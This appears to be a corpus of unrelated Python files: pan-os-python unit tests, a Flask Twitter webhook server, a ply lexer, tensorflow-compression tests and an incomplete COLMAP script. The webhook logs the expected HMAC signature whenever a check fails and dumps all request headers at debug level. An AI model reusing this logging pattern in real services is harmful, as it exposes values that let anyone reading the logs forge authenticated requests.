            "baz", path="foo/bar/baz", vartype="member", condition=None, values=None
        )
        settings = {"baz": ["jack", "john", "jane", "margret"]}
        result = p.element(self.elm, settings, False)
        self.assertIsNotNone(result)
        elms = result.findall("./foo/bar/baz/member")
        self.assertEqual(len(settings["baz"]), len(elms))
        for elm in elms:
            self.assertTrue(elm.text in settings["baz"])
class Abouter(object):
    """Minimal stand-in parent whose _about_object() exposes a mode value."""

    def __init__(self, mode="layer3"):
        # Default mirrors the most common interface mode used in the tests.
        self.mode = mode

    def _about_object(self):
        """Return the about-dict ParentAwareXpath inspects."""
        return dict(mode=self.mode)
class ParentClass1(Abouter):
    """Parent type associated with the specific xpath profiles below."""
    pass

class ParentClass2(Abouter):
    """Second parent type associated with the specific xpath profiles."""
    pass

class UnassociatedParent(Abouter):
    """Parent type with no registered profile; falls back to defaults."""
    pass
class TestParentAwareXpathBasics(unittest.TestCase):
    """ParentAwareXpath selection by parent class and PAN-OS version."""

    DEFAULT_PATH_1 = "/default/path/1"
    DEFAULT_PATH_2 = "/default/path/2"
    SPECIFIED_PATH_1 = "/some/specific/path/1"
    SPECIFIED_PATH_2 = "/some/specific/path/2"

    def setUp(self):
        # Two default profiles (pre/post 1.0.0) and two parent-specific
        # profiles (pre/post 2.0.0) for ParentClass1/ParentClass2.
        self.obj = Base.ParentAwareXpath()
        self.obj.add_profile(value=self.DEFAULT_PATH_1)
        self.obj.add_profile("1.0.0", self.DEFAULT_PATH_2)
        self.obj.add_profile(
            value=self.SPECIFIED_PATH_1, parents=("ParentClass1", "ParentClass2")
        )
        self.obj.add_profile(
            "2.0.0", self.SPECIFIED_PATH_2, ("ParentClass1", "ParentClass2")
        )

    def test_old_default_xpath(self):
        """Unassociated parent + old version -> first default path."""
        parent = UnassociatedParent()
        self.assertEqual(
            self.DEFAULT_PATH_1, self.obj._get_versioned_value((0, 5, 0), parent)
        )

    def test_new_default_xpath(self):
        """Unassociated parent + >=1.0.0 -> second default path."""
        parent = UnassociatedParent()
        self.assertEqual(
            self.DEFAULT_PATH_2, self.obj._get_versioned_value((1, 0, 0), parent)
        )

    def test_old_specefied_xpath_for_class1(self):
        """ParentClass1 + old version -> first specific path."""
        parent = ParentClass1()
        self.assertEqual(
            self.SPECIFIED_PATH_1, self.obj._get_versioned_value((0, 5, 0), parent)
        )

    def test_new_specefied_xpath_for_class1(self):
        """ParentClass1 + >=2.0.0 -> second specific path."""
        parent = ParentClass1()
        self.assertEqual(
            self.SPECIFIED_PATH_2, self.obj._get_versioned_value((2, 0, 0), parent)
        )

    def test_old_specefied_xpath_for_class2(self):
        """ParentClass2 + old version -> first specific path."""
        parent = ParentClass2()
        self.assertEqual(
            self.SPECIFIED_PATH_1, self.obj._get_versioned_value((0, 0, 0), parent)
        )

    def test_new_specefied_xpath_for_class2(self):
        """ParentClass2 + new version -> second specific path."""
        parent = ParentClass2()
        self.assertEqual(
            self.SPECIFIED_PATH_2, self.obj._get_versioned_value((5, 0, 0), parent)
        )

    def test_no_parent_gets_newest_version(self):
        """No parent falls back to the newest default profile."""
        parent = None
        self.assertEqual(
            self.DEFAULT_PATH_2,
            self.obj._get_versioned_value(
                Base.VersionedPanObject._UNKNOWN_PANOS_VERSION, parent
            ),
        )

    def test_no_fallback_raises_value_error(self):
        """With only parent-specific profiles, no parent means ValueError."""
        parent = None
        obj = Base.ParentAwareXpath()
        obj.add_profile(
            parents=("ParentClass1",), value="/some/path",
        )
        self.assertRaises(ValueError, obj._get_versioned_value, (1, 0, 0), parent)
class TestParentAwareXpathWithParams(unittest.TestCase):
    """ParentAwareXpath selection refined by a parent parameter value."""

    OLD_LAYER3_PATH = "/units/layer3/old"
    NEW_LAYER3_PATH = "/units/layer3/new"
    OLD_LAYER2_PATH = "/units/layer2/old"
    NEW_LAYER2_PATH = "/units/layer2/new"

    def setUp(self):
        # Layer3 profiles apply to ParentClass1 or no parent; layer2
        # profiles require ParentClass1 with mode in {"junk", "layer2"}.
        self.obj = Base.ParentAwareXpath()
        self.obj.add_profile(parents=("ParentClass1", None), value=self.OLD_LAYER3_PATH)
        self.obj.add_profile(
            version="1.0.0", parents=("ParentClass1", None), value=self.NEW_LAYER3_PATH
        )
        self.obj.add_profile(
            parents=("ParentClass1",),
            parent_param="mode",
            parent_param_values=["junk", "layer2"],
            value=self.OLD_LAYER2_PATH,
        )
        self.obj.add_profile(
            version="2.0.0",
            parents=("ParentClass1",),
            parent_param="mode",
            parent_param_values=["junk", "layer2"],
            value=self.NEW_LAYER2_PATH,
        )

    def test_old_default_path(self):
        """Unassociated parent gets the default (layer3) path."""
        parent = UnassociatedParent("foo")
        self.assertEqual(
            self.OLD_LAYER3_PATH, self.obj._get_versioned_value((0, 5, 0), parent)
        )

    def test_known_parent_and_param_for_old_l3_path(self):
        """ParentClass1 with default mode (layer3) -> old l3 path."""
        parent = ParentClass1()
        self.assertEqual(
            self.OLD_LAYER3_PATH, self.obj._get_versioned_value((0, 5, 0), parent)
        )

    def test_known_parent_and_param_for_new_l3_path(self):
        """ParentClass1 with default mode at >=1.0.0 -> new l3 path."""
        parent = ParentClass1()
        self.assertEqual(
            self.NEW_LAYER3_PATH, self.obj._get_versioned_value((1, 5, 0), parent)
        )

    def test_known_parent_and_param_for_old_l2_path(self):
        """ParentClass1 in layer2 mode -> old l2 path before 2.0.0."""
        parent = ParentClass1("layer2")
        self.assertEqual(
            self.OLD_LAYER2_PATH, self.obj._get_versioned_value((0, 1, 0), parent)
        )

    def test_known_parent_and_param_for_new_l2_path(self):
        """ParentClass1 in layer2 mode -> new l2 path from 2.0.0."""
        parent = ParentClass1("layer2")
        self.assertEqual(
            self.NEW_LAYER2_PATH, self.obj._get_versioned_value((5, 1, 0), parent)
        )

    def test_no_parent_gets_newest_default(self):
        """No parent falls back to the newest None-parent profile."""
        parent = None
        self.assertEqual(
            self.NEW_LAYER3_PATH,
            self.obj._get_versioned_value(
                Base.VersionedPanObject._UNKNOWN_PANOS_VERSION, parent
            ),
        )
class MyVersionedObject(Base.VersionedPanObject):
    """Small VersionedPanObject fixture with entry, member, and int params."""

    SUFFIX = Base.ENTRY

    def _setup(self):
        # Parameters: one entry-list, one member-list, one integer.
        params = []
        params.append(
            Base.VersionedParamPath("entries", path="multiple/entries", vartype="entry")
        )
        params.append(
            Base.VersionedParamPath(
                "members", path="multiple/members", vartype="member"
            )
        )
        params.append(Base.VersionedParamPath("someint", path="someint", vartype="int"))
        self._params = tuple(params)
class TestEqual(unittest.TestCase):
    """PanObject.equal(): order-insensitive for entry/member list params."""

    def test_ordered(self):
        o1 = MyVersionedObject("a", ["a", "b"], ["c", "d"], 5)
        o2 = MyVersionedObject("a", ["a", "b"], ["c", "d"], 5)
        self.assertTrue(o1.equal(o2))

    def test_unordered_entries(self):
        """Entry lists compare as sets, not sequences."""
        o1 = MyVersionedObject("a", ["a", "b"], ["c", "d"], 5)
        o2 = MyVersionedObject("a", ["b", "a"], ["c", "d"], 5)
        self.assertTrue(o1.equal(o2))

    def test_unordered_members(self):
        """Member lists compare as sets, not sequences."""
        o1 = MyVersionedObject("a", ["a", "b"], ["c", "d"], 5)
        o2 = MyVersionedObject("a", ["a", "b"], ["d", "c"], 5)
        self.assertTrue(o1.equal(o2))

    def test_values_are_unchanged_after_comparison(self):
        """equal() must not reorder or mutate either operand's lists."""
        o1 = MyVersionedObject("a", ["a", "b"], ["c", "d"], 5)
        o2 = MyVersionedObject("a", ["b", "a"], ["d", "c"], 5)
        o1.equal(o2)
        self.assertEqual(o1.entries, ["a", "b"])
        self.assertEqual(o1.members, ["c", "d"])
        self.assertEqual(o2.entries, ["b", "a"])
        self.assertEqual(o2.members, ["d", "c"])

    def test_str_list_field_is_equal(self):
        """A bare string equals a one-element list of the same string."""
        o1 = MyVersionedObject("a", ["a",], ["c", "d"], 5)
        o2 = MyVersionedObject("a", "a", ["c", "d"], 5)
        self.assertTrue(o1.equal(o2))

    def test_unequal_entries_returns_false(self):
        o1 = MyVersionedObject("a", ["a", "b"], ["c", "d"], 5)
        o2 = MyVersionedObject("a", ["a", "i"], ["c", "d"], 5)
        self.assertFalse(o1.equal(o2))

    def test_unequal_members_returns_false(self):
        o1 = MyVersionedObject("a", ["a", "b"], ["c", "d"], 5)
        o2 = MyVersionedObject("a", ["a", "b"], ["c", "i"], 5)
        self.assertFalse(o1.equal(o2))

    def test_unequal_ints_returns_false(self):
        o1 = MyVersionedObject("a", ["a", "b"], ["c", "d"], 5)
        o2 = MyVersionedObject("a", ["a", "b"], ["c", "d"], 6)
        self.assertFalse(o1.equal(o2))
class TestTree(unittest.TestCase):
    """PanDevice.dot(): graphviz rendering of the config tree."""

    def test_dot(self):
        # Imported here to avoid a module-level dependency for other tests.
        import panos.device as Device

        expected = (
            "digraph configtree {graph [rankdir=LR, fontsize=10, margin=0.001];"
            "node [shape=box, fontsize=10, height=0.001, margin=0.1, ordering=out];"
            '"PanDevice : None" [style=filled fillcolor= '
            'URL="http://pan-os-python.readthedocs.io/en/latest/module-base.html#panos.base.PanDevice" '
            'target="_blank"];"SystemSettings : " [style=filled fillcolor=lightpink '
            'URL="http://pan-os-python.readthedocs.io/en/latest/module-device.html'
            '#panos.device.SystemSettings" target="_blank"];'
            '"PanDevice : None" -> "SystemSettings : ";}'
        )
        fw = Base.PanDevice(hostname=None, serial="Serial")
        sys = Device.SystemSettings()
        fw.add(sys)
        ret_val = fw.dot()
        self.assertEqual(ret_val, expected)
class TestPanDevice(unittest.TestCase):
    """PanDevice.plugins() parsing of the op-command XML response."""

    def setUp(self):
        self.obj = Base.PanDevice("localhost", "admin", "admin", "secret")
        # Pin a version so no device call is needed for version checks.
        self.obj._version_info = (99, 0, 0)

    def test_plugins_empty_release_note(self):
        """An empty CDATA release-note-url parses to an empty string."""
        resp = [
            '<response status="success"><result><plugins>',
            "<entry>",
            "<name>vm_series</name>",
            "<version>1.0.11</version>",
            "<release-date>Built-in</release-date>",
            "<release-note-url><![CDATA[]]></release-note-url>",
            "<pkg-file>vm_series-1.0.11</pkg-file>",
            "<size>15M</size>",
            "<platform>any</platform>",
            "<installed>yes</installed>",
            "<downloaded>yes</downloaded>",
            "</entry>",
            "</plugins></result></response>",
        ]
        spec = {
            "return_value": ET.fromstring("".join(resp)),
        }
        self.obj.op = mock.Mock(**spec)
        ans = self.obj.plugins()
        self.assertTrue(ans is not None)
        self.assertTrue(isinstance(ans, list))
        self.assertTrue(len(ans) == 1)
        ad = ans[0]
        self.assertTrue(isinstance(ad, dict))
        # XML tag names map to snake_case dict keys.
        self.assertEqual(ad.get("name"), "vm_series")
        self.assertEqual(ad.get("version"), "1.0.11")
        self.assertEqual(ad.get("release_date"), "Built-in")
        self.assertEqual(ad.get("release_note_url"), "")
        self.assertEqual(ad.get("package_file"), "vm_series-1.0.11")
        self.assertEqual(ad.get("size"), "15M")
        self.assertEqual(ad.get("platform"), "any")
        self.assertEqual(ad.get("installed"), "yes")
        self.assertEqual(ad.get("downloaded"), "yes")
class TestWhoami(unittest.TestCase):
    """PanDevice.whoami(): find the admin entry flagged with <self/>."""

    def test_self_is_present(self):
        expected = "user2"
        resp = [
            "<response>",
            "<result>",
            "<admins>",
            "<entry><admin>user1</admin><type>Web</type></entry>",
            "<entry><admin>{0}</admin><type>Web</type><self/></entry>".format(expected),
            "</admins>",
            "</result>",
            "</response>",
        ]
        spec = {
            "return_value": ET.fromstring("".join(resp)),
        }
        con = Base.PanDevice("127.0.0.1", "a", "b", "c")
        con.op = mock.Mock(**spec)
        self.assertEqual(expected, con.whoami())

    def test_not_present(self):
        """With no <self/> marker, whoami() is None."""
        resp = [
            "<response>",
            "<result>",
            "<admins>",
            "<entry><admin>user1</admin><type>Web</type></entry>",
            "<entry><admin>user2</admin><type>Web</type></entry>",
            "<entry><admin>user3</admin><type>Web</type></entry>",
            "</admins>",
            "</result>",
            "</response>",
        ]
        spec = {
            "return_value": ET.fromstring("".join(resp)),
        }
        con = Base.PanDevice("127.0.0.1", "a", "b", "c")
        con.op = mock.Mock(**spec)
        self.assertIsNone(con.whoami())
class TestDeleteSimilar(unittest.TestCase):
    """delete_similar(): xpath construction and chunking of bulk deletes."""

    def config(self, length=10, count=1, suffix="entry"):
        """Build a mock device plus `count` objects with random uids.

        length: uid length (longer uids make the xpath hit the chunk
            limit sooner).
        suffix: "entry" or "member", selecting the predicate style.
        Returns (device_mock, object_list, first_object).
        """
        dev = mock.Mock()
        chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
        listing = []
        for x in range(count):
            obj = Base.PanObject("".join(random.choice(chars) for y in range(length)),)
            obj.parent = mock.Mock()
            listing.append(obj)
        # Now tweak the first element for the tests, the rest don't matter.
        obj = listing[0]
        obj._gather_bulk_info = mock.Mock(return_value=(dev, listing, None),)
        if suffix == "member":
            obj.SUFFIX = Base.MEMBER
        else:
            obj.SUFFIX = Base.ENTRY
        obj._perform_vsys_dict_import_delete = mock.Mock()
        obj.xpath_nosuffix = mock.Mock(return_value="/mock/xpath")
        return dev, listing, obj

    def test_delete_one_entry(self):
        """Single entry uses an @name predicate."""
        dev, listing, obj = self.config()
        obj.delete_similar()
        dev.xapi.delete.assert_called_once()
        dev.xapi.delete.assert_called_once_with(
            "/mock/xpath/entry[@name='{0}']".format(obj.uid), retry_on_peer=obj.HA_SYNC,
        )

    def test_delete_one_member(self):
        """Single member uses a text() predicate."""
        dev, listing, obj = self.config(suffix="member")
        obj.delete_similar()
        dev.xapi.delete.assert_called_once()
        dev.xapi.delete.assert_called_once_with(
            "/mock/xpath/member[text()='{0}']".format(obj.uid),
            retry_on_peer=obj.HA_SYNC,
        )

    def test_delete_two_entries(self):
        """Multiple entries are OR'd into one predicate."""
        dev, listing, obj = self.config(count=2)
        obj.delete_similar()
        dev.xapi.delete.assert_called_once()
        dev.xapi.delete.assert_called_once_with(
            "/mock/xpath/entry[@name='{0}' or @name='{1}']".format(
                listing[0].uid, listing[1].uid
            ),
            retry_on_peer=obj.HA_SYNC,
        )

    def test_delete_two_members(self):
        """Multiple members are OR'd into one predicate."""
        dev, listing, obj = self.config(count=2, suffix="member")
        obj.delete_similar()
        dev.xapi.delete.assert_called_once()
        dev.xapi.delete.assert_called_once_with(
            "/mock/xpath/member[text()='{0}' or text()='{1}']".format(
                listing[0].uid, listing[1].uid
            ),
            retry_on_peer=obj.HA_SYNC,
        )

    def test_delete_gets_chunked_for_entries(self):
        """Oversized predicates are split into multiple delete calls."""
        dev, listing, obj = self.config(length=30, count=1000, suffix="entry")
        obj.delete_similar()
        self.assertEqual(2, dev.xapi.delete.call_count)

    def test_delete_gets_chunked_for_members(self):
        dev, listing, obj = self.config(length=30, count=1000, suffix="member")
        obj.delete_similar()
        self.assertEqual(2, dev.xapi.delete.call_count)

    def test_delete_extreme_entries(self):
        """Very large batches chunk into more than two calls."""
        dev, listing, obj = self.config(length=30, count=10000, suffix="entry")
        obj.delete_similar()
        self.assertTrue(dev.xapi.delete.call_count > 2)

    def test_delete_extreme_members(self):
        dev, listing, obj = self.config(length=30, count=10000, suffix="member")
        obj.delete_similar()
        self.assertTrue(dev.xapi.delete.call_count > 2)
if __name__ == "__main__":
    # Allow running this test module directly.
    unittest.main()
| StarcoderdataPython |
4818402 | from .viewport_helpers import compute_view # noqa
from .type_checking import is_pandas_df # noqa
from .color_scales import assign_random_colors # noqa
| StarcoderdataPython |
1935182 | <gh_stars>1-10
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import base64
import hashlib
import hmac
import json
import logging
import redis
import sys
from datetime import datetime
from flask import Flask, abort, request
from config import TWITTER_CONSUMER_SECRET
from utils import Queue
# Verbose logging: every request/response pair is dumped by track_request below.
logging.basicConfig(
    level=logging.DEBUG,
    format="%(asctime)s %(levelname)s - %(message)s",
)
app = Flask(__name__)
# Buffer for incoming webhook events (utils.Queue; presumably Redis-backed,
# given the redis import above -- confirm in utils).
queue = Queue()
@app.after_request
def track_request(response):
    """Debug aid: log every request/response pair as pretty-printed JSON."""
    payload = {
        "time" : str(datetime.now()),
        "request": {
            "endpoint"   : request.endpoint,
            "method"     : request.method,
            "path"       : request.path,
            "headers"    : dict(request.headers),
            "args"       : dict(request.args),
            "form"       : request.form,
            "data"       : str(request.data, 'ascii'),
            "remote_addr": request.remote_addr,
        },
        "response": {
            "status_code": response.status_code,
            "headers"    : dict(response.headers),
            "data"       : str(response.data, 'ascii'),
        },
    }
    logging.debug("Payload\n" + json.dumps(payload, indent=4))
    return response
# Challenge-Response Checks
@app.route("/webhook", methods=['GET'])
def webhook_crc():
    """Answer Twitter's CRC handshake with an HMAC-SHA256 response token."""
    token = request.args.get('crc_token')
    if token is None:
        abort(400)
    mac = hmac.new(
        key=TWITTER_CONSUMER_SECRET.encode(),
        msg=token.encode(),
        digestmod=hashlib.sha256,
    )
    response_token = base64.b64encode(mac.digest()).decode()
    logging.info(f"CRC: token={token}, response_token={response_token}")
    return json.dumps({'response_token': "sha256=" + response_token})
# Events Webhook
@app.route("/webhook", methods=['POST'])
def webhook_event():
    """Validate the Twitter webhook signature, then enqueue the JSON event.

    Returns 400 when the HMAC-SHA256 signature does not match; otherwise
    pushes the payload onto the queue and returns "OK".
    """
    # Validate Request from Twitter
    signature_user = request.headers.get('x-twitter-webhooks-signature', "")
    if signature_user.startswith("sha256="):
        signature_user = signature_user[7:]  # strip the "sha256=" prefix
    digest = hmac.new(
        key=TWITTER_CONSUMER_SECRET.encode(),
        msg=request.data,
        digestmod=hashlib.sha256,
    ).digest()
    signature_server = base64.b64encode(digest).decode()
    # compare_digest avoids leaking timing information during the comparison.
    if not hmac.compare_digest(signature_user, signature_server):
        # Fix: logging.warn() is a deprecated alias; use logging.warning().
        logging.warning(f"Webhook signature invalid: signature_user={signature_user}, signature_server={signature_server}")
        return abort(400)
    # Add Event Message to Redis Queue
    if request.json:
        queue.add(request.json)
    else:
        logging.warning(f"Non-JSON message: {request.data}")
    return "OK"
if __name__ == '__main__':
    # Run the Flask development server (not for production use).
    app.run()
| StarcoderdataPython |
3281612 | <gh_stars>10-100
from ..config import *
from ply.lex import lex as plex
# lex
# Token names recognized by the ply lexer; each t_<name> rule below supplies
# the matching regex via its docstring.
tokens = (
    'bofx',
    'eofx',
    'newline',
    'tab',
    'interpolant',
    'lce',
    'rce',
    'string',
)
def t_newline(t):
    # NOTE: in ply, this docstring IS the token's regex -- do not edit it.
    r'\n'
    return t
def t_tab(t):
    # NOTE: in ply, this docstring IS the token's regex -- do not edit it.
    r'\t'
    return t
def t_interpolant(t):
    # ply regex (docstring): "{fmt:arg}" with named groups for both parts.
    r'\{(?P<fmt>[^\{:]*):(?P<arg>[^\}]+)\}'
    # Wrap the raw match in an Interpolant (defined below) for later stages.
    t.value = Interpolant(t)
    return t
def t_lce(t):
    r'\{\{'
    # "{{" escapes a literal '{'; emit it pre-quoted for the parser.
    t.value = "'{'"
    return t
def t_rce(t):
    r'\}\}'
    # "}}" escapes a literal '}'; emit it pre-quoted for the parser.
    t.value = "'}'"
    return t
def t_string(t):
    r'[^\{\}\t\n]+'
    # Plain text run; repr() quotes it so later stages can embed it verbatim.
    t.value = repr(t.value)
    return t
def t_error(t):
    # Called by ply on an unmatchable character; report through the owning
    # module's error machinery (`err` comes from the star-import of ..config).
    t.lexer.module.throw(
        err.string_format_error,
        line = t.lexer.lineno,
        position = t.lexer.lexpos,
        token = repr(t.value),
    )
# Prototype lexer built from the t_* rules above; Lexer clones it per module.
main_lexer = plex()
class Lexer(Data):
    # Per-module wrapper around the shared ply lexer. Also accumulates the
    # pieces of a format expression via the overloaded operators below
    # (presumably driven by the fml parser -- confirm against the grammar).
    def __init__(s, module):
        s.module = module
        # Clone the prototype so per-module lexer state does not leak.
        s.lexer = main_lexer.clone()
        s.lexer.module = module
        s.fmt = []   # collected format-string fragments
        s.args = []  # collected interpolation arguments
        s.star_used = 0
    def star(s):
        # Return '*' exactly once per Lexer instance, '' on later calls.
        if s.star_used:
            return ''
        else:
            s.star_used = 1
            return '*'
    def input(s, source):
        # Tokenize eagerly, bracketing the stream with bofx/eofx sentinels.
        s.lexer.input(source)
        s.tokens = [Bofx()]
        t = s.lexer.token()
        while t:
            s.tokens.append(t)
            t = s.lexer.token()
        s.tokens.append(Eofx())
        if s.module.verbose.fml:
            s.module.verbose_tag('fml: lex')
            for t in s.tokens:
                print(t.type, repr(t.value))
    def token(s):
        # ply-style interface: pop the next buffered token; None when done.
        if s.tokens:
            return s.tokens.pop(0)
    # Operator overloads form a tiny DSL for assembling the format call:
    def __add__(s, other):
        # quoted fragment followed by a comma separator
        s.fmt.append('\"' + other + ',\"')
        return s
    def __truediv__(s, other):
        # quoted literal fragment
        s.fmt.append('\"' + other + '\"')
        return s
    def __mul__(s, other):
        # raw (already formatted) fragment
        s.fmt.append(other)
        return s
    def __sub__(s, other):
        # record an argument expression
        s.args.append(other)
        return s
class Bofx:
    """Sentinel token marking the beginning of a format expression."""
    type = 'bofx'
    value = ''

    def __repr__(self):
        return 'Bofx()'
class Eofx:
    """Sentinel token marking the end of a format expression."""
    type = 'eofx'
    value = ''

    def __repr__(self):
        return 'Eofx()'
class Interpolant(Data):
    """Parsed '{fmt:arg}' interpolant captured by t_interpolant."""
    def __init__(s, t):
        # Pull the named regex groups out of the match that produced token t.
        m = t.lexer.lexmatch
        s.fmt = m.group('fmt')
        s.arg = m.group('arg')
        s.value = t.value
    def __repr__(s):
        return "'{:s}' '{:s}'".format(s.fmt, s.arg)
6465510 | <filename>tensorflow_compression/python/ops/math_ops_test.py
# Copyright 2018 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for the math operations."""
import scipy.stats
import tensorflow as tf
from tensorflow.python.framework import test_util
from tensorflow_compression.python.ops import math_ops
from tensorflow_compression.python.ops import soft_round_ops
@test_util.deprecated_graph_mode_only
class MathTest(tf.test.TestCase):
  """Tests upper_bound/lower_bound clipping ops and their custom gradients."""
  def _test_upper_bound(self, gradient):
    # Clip at 0 from above and check how each gradient mode treats incoming
    # gradients that push past (pgrads, +1) or away from (ngrads, -1) the bound.
    inputs = tf.compat.v1.placeholder(dtype=tf.float32)
    outputs = math_ops.upper_bound(inputs, 0, gradient=gradient)
    pgrads, = tf.gradients([outputs], [inputs], [tf.ones_like(inputs)])
    ngrads, = tf.gradients([outputs], [inputs], [-tf.ones_like(inputs)])
    inputs_feed = [-1, 1]
    outputs_expected = [-1, 0]
    if gradient == "disconnected":
      # Gradient is zero wherever the bound is active.
      pgrads_expected = [1, 0]
      ngrads_expected = [-1, 0]
    elif gradient == "identity":
      # Gradient passes through unchanged everywhere.
      pgrads_expected = [1, 1]
      ngrads_expected = [-1, -1]
    else:
      # "identity_if_towards": only gradients pushing the value back into the
      # feasible region pass through.
      pgrads_expected = [1, 1]
      ngrads_expected = [-1, 0]
    with self.cached_session() as sess:
      outputs, pgrads, ngrads = sess.run(
          [outputs, pgrads, ngrads], {inputs: inputs_feed})
      self.assertAllEqual(outputs, outputs_expected)
      self.assertAllEqual(pgrads, pgrads_expected)
      self.assertAllEqual(ngrads, ngrads_expected)
  def test_upper_bound_disconnected(self):
    self._test_upper_bound("disconnected")
  def test_upper_bound_identity(self):
    self._test_upper_bound("identity")
  def test_upper_bound_identity_if_towards(self):
    self._test_upper_bound("identity_if_towards")
  def test_upper_bound_invalid(self):
    # Unknown gradient mode must be rejected at graph-construction time.
    with self.assertRaises(ValueError):
      self._test_upper_bound("invalid")
  def _test_lower_bound(self, gradient):
    # Mirror image of _test_upper_bound: clip at 0 from below.
    inputs = tf.compat.v1.placeholder(dtype=tf.float32)
    outputs = math_ops.lower_bound(inputs, 0, gradient=gradient)
    pgrads, = tf.gradients([outputs], [inputs], [tf.ones_like(inputs)])
    ngrads, = tf.gradients([outputs], [inputs], [-tf.ones_like(inputs)])
    inputs_feed = [-1, 1]
    outputs_expected = [0, 1]
    if gradient == "disconnected":
      pgrads_expected = [0, 1]
      ngrads_expected = [0, -1]
    elif gradient == "identity":
      pgrads_expected = [1, 1]
      ngrads_expected = [-1, -1]
    else:
      pgrads_expected = [0, 1]
      ngrads_expected = [-1, -1]
    with self.cached_session() as sess:
      outputs, pgrads, ngrads = sess.run(
          [outputs, pgrads, ngrads], {inputs: inputs_feed})
      self.assertAllEqual(outputs, outputs_expected)
      self.assertAllEqual(pgrads, pgrads_expected)
      self.assertAllEqual(ngrads, ngrads_expected)
  def test_lower_bound_disconnected(self):
    self._test_lower_bound("disconnected")
  def test_lower_bound_identity(self):
    self._test_lower_bound("identity")
  def test_lower_bound_identity_if_towards(self):
    self._test_lower_bound("identity_if_towards")
  def test_lower_bound_invalid(self):
    with self.assertRaises(ValueError):
      self._test_lower_bound("invalid")
class PerturbAndApplyTest(tf.test.TestCase):
  """Tests math_ops.perturb_and_apply (additive-uniform-noise relaxation)."""
  def test_perturb_and_apply_noise(self):
    # The perturbation reported via x_plus_u0 must equal y - x, and must look
    # like U(-0.5, 0.5) noise.
    x = tf.random.normal([10000], seed=0)
    y, x_plus_u0 = math_ops.perturb_and_apply(
        tf.identity, x, expected_grads=True)
    u0 = x_plus_u0-x
    u1 = y - x
    # Check if residuals are as expected
    self.assertAllClose(u0, u1)
    # Check if noise has expected uniform distribution
    # (Kolmogorov-Smirnov test against U(-0.5, 0.5); the 1e-6 p-value bar is
    # deliberately loose to avoid flaky failures.)
    _, p = scipy.stats.kstest(u0, "uniform", (-0.5, 1.0))
    self.assertAllLessEqual(tf.abs(u0), 0.5)
    self.assertGreater(p, 1e-6)
  def test_perturb_and_apply_gradient_soft_round(self):
    # With expected_grads=True, soft-round's expected gradient w.r.t. x is 1.
    f = soft_round_ops.soft_round
    x = tf.linspace(-2.0, 2.0, 200)
    temperature = 7.0
    with tf.GradientTape(persistent=True) as g:
      g.watch(x)
      y = math_ops.perturb_and_apply(f, x, temperature, expected_grads=True)[0]
    dx = g.gradient(y, x)
    self.assertAllClose(dx, tf.ones_like(dx))
  def test_perturb_and_apply_gradient_parabola(self):
    # For f(x) = a*x^2 the expected gradient equals the central finite
    # difference f(x+0.5) - f(x-0.5).
    f = lambda x, a: a*x*x
    x = tf.linspace(-2.0, 2.0, 200)
    a = 7.0
    with tf.GradientTape(persistent=True) as g:
      g.watch(x)
      y = math_ops.perturb_and_apply(f, x, a, expected_grads=True)[0]
    dx = g.gradient(y, x)
    self.assertAllClose(dx, f(x+.5, a)-f(x-.5, a))
if __name__ == "__main__":
  # Run all TF test cases in this module.
  tf.test.main()
| StarcoderdataPython |
1903458 | # coding: utf-8
import os
import numpy as np
from database import *
from read_write_model import *
import cv2
import pcl
def get_default_camera_model(img_path_name, camera_id):
    """Build a SIMPLE_RADIAL Camera with heuristic intrinsics for an image.

    Returns None if the image cannot be loaded.
    """
    img = cv2.imread(img_path_name)
    if img is None:
        print('failed to load image:', img_path_name)
        return None
    # rows, columns, channels
    hh, ww, cc = img.shape
    # Heuristics: focal length ~ 1.2 * width, principal point at image center,
    # zero radial distortion.
    focal_length = ww * 1.2
    cx = ww * 0.5
    cy = hh * 0.5
    params = np.array(tuple(map(float, [focal_length, cx, cy, 0.0])))
    return Camera(id=int(camera_id), model='SIMPLE_RADIAL',
                  width=ww, height=hh, params=params)
def get_fisheye_camera_model(img_path_name, camera_id):
    """Build a RADIAL_FISHEYE Camera with heuristic intrinsics for an image.

    Returns None if the image cannot be loaded.
    """
    img = cv2.imread(img_path_name)
    if img is None:
        print('failed to load image:', img_path_name)
        return None
    # rows, columns, channels
    hh, ww, cc = img.shape
    # Same heuristics as get_default_camera_model, plus a second zero
    # distortion coefficient required by the fisheye model.
    focal_length = ww * 1.2
    cx = ww * 0.5
    cy = hh * 0.5
    params = np.array(tuple(map(float, [focal_length, cx, cy, 0.0, 0.0])))
    return Camera(id=int(camera_id), model='RADIAL_FISHEYE',
                  width=ww, height=hh, params=params)
def get_image_model(tum, image_id, camera_id, image_name):
    """Convert one TUM-format trajectory row into a colmap Image record.

    NOTE(review): the comment below says tum is T_C2W while colmap expects
    T_W2C, yet the inversion call is commented out, so the pose is passed
    through unchanged -- confirm this is intentional.
    """
    # tum is T_C2W, but colmap needs T_W2C
    # tum_inv = io_tool.tum_str_inv(tum)
    tum_inv = tum
    # TUM row layout assumed: [time, tx, ty, tz, qx, qy, qz, qw]
    colmap_tvec = [tum_inv[1], tum_inv[2], tum_inv[3]]
    tvec = np.array(tuple(map(float, colmap_tvec)))
    # Quaternion reordered to colmap's (qw, qx, qy, qz) convention.
    colmap_qvec = [tum_inv[7], tum_inv[4], tum_inv[5], tum_inv[6]]
    qvec = np.array(tuple(map(float, colmap_qvec)))
    # No 2D-3D correspondences yet; placeholder arrays.
    xys = np.array([''])
    point3D_ids = np.array([''])
    img = Image(id=image_id, qvec=qvec, tvec=tvec, camera_id=camera_id, name=image_name, xys=xys, point3D_ids=point3D_ids)
    return img
if __name__ == '__main__':
    # NOTE(review): database_path_name, first_image, traj, count, time_str and
    # the loop variable `i` are not defined in this file -- presumably they are
    # provided by the star-imports (database / read_write_model); confirm.
    db = COLMAPDatabase.connect(database_path_name)
    db.create_tables()
    # Camera 1: SIMPLE_RADIAL model guessed from the first image.
    cam = get_default_camera_model(first_image, 1)
    model_id = CAMERA_MODEL_NAMES[cam.model].model_id
